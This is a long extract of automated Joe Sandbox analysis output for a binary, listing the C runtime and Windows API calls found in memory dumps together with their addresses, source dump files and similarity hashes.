                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 002EA412
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002EA45D
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002EA463
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002EA499
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002EA49F
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002EA4AF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                                              • Opcode ID: e7fa04e7ea6468c355f313255014111028134ae8830b15601953fa52bfcd091c
                                                                                                                                                                                                                                                              • Instruction ID: e5ab5e2563b967c200b50acee507d8a3782bc4d9e100f6c0253ac23485df1ae4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7fa04e7ea6468c355f313255014111028134ae8830b15601953fa52bfcd091c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF713B32D602869BDF209F56CC46FAE7BFA9F45310F944055FD04A7281E7B5EC208B62
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 002D550C
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 002D5538
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 002D5577
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002D5594
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002D55D3
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 002D55F0
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002D5632
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002D5655
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                                              • Opcode ID: 78637318af93d9139ae5550531069c59578ec8b38dbff9e54402393cef0f7baf
                                                                                                                                                                                                                                                              • Instruction ID: aefab2c896327dc4e6a8a346847f5f712b61d6b74d644bc64c1ce031dd15b162
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78637318af93d9139ae5550531069c59578ec8b38dbff9e54402393cef0f7baf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF51B372620626AFEF209F60DC45FBA7BADEF40B90F644426F90196290D7B0CD20CB90
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 002D6217
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 002D621F
                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 002D62A8
                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 002D62D3
                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 002D6328
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                              • Opcode ID: 1ac66fb0ac4cd711fc454ba7987d94589105f09db973ba64e58a697db40272f5
                                                                                                                                                                                                                                                              • Instruction ID: ef62c7df4bc664c8282d0faf06c8c3c42245f6a1d37721119cd7ed334d4839b2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ac66fb0ac4cd711fc454ba7987d94589105f09db973ba64e58a697db40272f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B941A530A202199FCF10EF68C88CA9EBBA5EF45324F148566ED145B392C771EE25CF90
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,002DF578,002D186A,?,00000000,002D31E1,002D186C,?,002DF1F6,00000022,FlsSetValue,002EDFE0,8,/,002D31E1), ref: 002DF52A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                              • Opcode ID: 8f8e1b2b410a7d2f8dffba2190fb0a5b630109fafcbdee7f28fb5e1f60543c58
                                                                                                                                                                                                                                                              • Instruction ID: 09540a00f6feb69ff63a416653f2e338fff54ea4f7675289cd4411ce584f660f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f8e1b2b410a7d2f8dffba2190fb0a5b630109fafcbdee7f28fb5e1f60543c58
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A21D872A21212ABC721DF65FD49A6B7758EF417B4B250132ED07A7390E770EE20CAD4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b05a4dcdf3829f2c5f1cd5378674dd62fe99001c836e470d4fff40fee03731fe
                                                                                                                                                                                                                                                              • Instruction ID: 02054bd5aff0a7cafec218d9f99199087447e0bdf8f7e53ec04b7c2f92598c64
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b05a4dcdf3829f2c5f1cd5378674dd62fe99001c836e470d4fff40fee03731fe
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBB15771A602869FCB11DFAAD858BBD7BB1BF25390F944269E4019B382C770DD21CF61
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,002DD2B7,002D5FB7,002D5179), ref: 002DD2CE
                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002DD2DC
                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002DD2F5
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,002DD2B7,002D5FB7,002D5179), ref: 002DD347
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                              • Opcode ID: cd84d75147ee6a6104786b69505360f3e6247c320c972fa947b228e914cb3678
                                                                                                                                                                                                                                                              • Instruction ID: bcce7a6482688e0b67b2937b92e27d2b18f94ed2010c74b48f16084827bbceb1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd84d75147ee6a6104786b69505360f3e6247c320c972fa947b228e914cb3678
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201283212DB629E96692E757CC997A2A84EB413B4374037BF610502E0EF914C30DEC1
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 002DDCA7
                                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 002DDF20
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                              • Opcode ID: 778c2897bc6fd49b7d2cb9921965fa32d8e165a2156ab8893c04fa9a2abe3545
                                                                                                                                                                                                                                                              • Instruction ID: 331a62923e7533f2a36db8016750b049511cd0ca61421d97557464ebed6d5feb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 778c2897bc6fd49b7d2cb9921965fa32d8e165a2156ab8893c04fa9a2abe3545
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFB15771820A0AAFCF25DFA4C881AAEBBB5BF14310F15445BE8116B316D771EE61CF91
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,865659BE,?,?,00000000,002EB774,000000FF,?,002D8D16,002D8BFD,?,002D8DB2,00000000), ref: 002D8C8A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002D8C9C
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,002EB774,000000FF,?,002D8D16,002D8BFD,?,002D8DB2,00000000), ref: 002D8CBE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                              • Opcode ID: 43c61460a208964212330fe2e7338cb0c4c5babde27fa6237f4675d2886bc40f
                                                                                                                                                                                                                                                              • Instruction ID: 1b7f39092473691611933c02663ae5f486781124ffc85ce3bb038ac2abb87742
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43c61460a208964212330fe2e7338cb0c4c5babde27fa6237f4675d2886bc40f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58018432961659EBDB119F50DC09BBEB7B8FB45B61F000536E811A22E0DBB49910CA90
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 002DFCC2
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 002DFD8B
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002DFDF2
                                                                                                                                                                                                                                                                • Part of subcall function 002DE531: RtlAllocateHeap.NTDLL(00000000,002D31E1,002D186A,?,002D60C1,002D186C,002D186A,?,?,?,002D3181,002D31E1,002D186E,002D186A,002D186A,002D186A), ref: 002DE563
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002DFE05
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 002DFE12
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1423051803-0
                                                                                                                                                                                                                                                              • Opcode ID: f0fa1d0648bf9a175b46705c2dda15f10508df0b508f606500ab3b743a37ec9f
                                                                                                                                                                                                                                                              • Instruction ID: 68b63d02ad24dec8f7ad86aebc0f1774ab57c7422322116124a2715d0729fdc6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0fa1d0648bf9a175b46705c2dda15f10508df0b508f606500ab3b743a37ec9f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E751D572520246ABDF60AF60DE41DBB77AAEF44714B25013BFD06D6311EB70CD309AA4
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 002D3017
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002D3022
                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002D3090
                                                                                                                                                                                                                                                                • Part of subcall function 002D2EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002D2EFC
                                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 002D303D
                                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 002D3053
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                                              • Opcode ID: 4ead8d73e1cf3c40f512ce8e978deec674f626834422e61117447f9f050200ab
                                                                                                                                                                                                                                                              • Instruction ID: 4282531a4d728dcfb1cde1c19112715c0d993586fd3988bcfa72cd7530f1d1c9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ead8d73e1cf3c40f512ce8e978deec674f626834422e61117447f9f050200ab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C301DBB5A201218BCB0AFF20E84997CBB71FF94390B14401AE81267381CF346E2ACFC1
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002E7F2E,00000000,?,002F6E10,?,?,?,002E7E65,00000004,InitializeCriticalSectionEx,002EE57C,002EE584), ref: 002E7E9F
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,002E7F2E,00000000,?,002F6E10,?,?,?,002E7E65,00000004,InitializeCriticalSectionEx,002EE57C,002EE584,00000000,?,002DE1DC), ref: 002E7EA9
                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 002E7ED1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                              • Opcode ID: b1414e46354bd4878bb21edfa8f76af3a0975e7215ddc0be40b28c49c85d0334
                                                                                                                                                                                                                                                              • Instruction ID: e8f0e561dbb370853838caeac4b52e2006ee086e72401e6e1547c9b4dc03e861
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1414e46354bd4878bb21edfa8f76af3a0975e7215ddc0be40b28c49c85d0334
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1E012702D4249B6EA105F72EC0AB697A59EB11BA0F544070FA0DB84E1D7A199609A85
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(865659BE,00000000,00000000,?), ref: 002E5690
                                                                                                                                                                                                                                                                • Part of subcall function 002DE641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002DFDE8,?,00000000,-00000008), ref: 002DE6A2
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002E58E2
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002E5928
